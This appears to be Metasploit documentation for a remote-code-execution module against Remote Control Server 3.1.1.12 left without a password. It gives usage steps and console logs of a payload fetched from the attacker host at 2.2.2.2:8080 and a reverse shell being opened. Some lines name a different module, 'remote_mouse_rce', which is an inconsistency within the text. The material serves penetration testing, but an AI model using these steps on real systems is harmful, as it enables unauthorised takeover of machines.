h00die
3.5 KiB
3.5 KiB
Vulnerable Application
This module utilizes the Remote Control Server's, part of the Remote Control Collection by Steppschuh, protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.1.1.12, current at the time of module writing
Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/windows/misc/remote_control_collection_rce - Set
rhostandlhostas required. - Do:
run - You should get a shell as the user who is running Remote Mouse.
Options
PATH
The location to write the payload to
Defaults to %temp%\\ aka c:\\Windows\\Temp\\ on most systems.
SLEEP
The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to 1.
Scenarios
Remote Control Server 3.1.1.12 on Windows 10
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 1.1.1.1:1978 - Connecting
[*] 1.1.1.1:1978 - Sending Windows key
[*] 1.1.1.1:1978 - Opening command prompt
[*] 1.1.1.1:1978 - Sending stager
[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
[*] 1.1.1.1:1978 - Server stopped.
[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
Remote Control Server 3.1.1.12 on Windows 10, with a password
Expected to fail.
resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_control_collection.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (remote_control_collection.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (remote_control_collection.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_control_collection_rce) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Connecting and Sending Windows key
[*] Opening command prompt
[*] Sending stager
[*] Using URL: http://2.2.2.2:8080/
[*] Executing payload
[*] Server stopped.
[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
[*] Exploit completed, but no session was created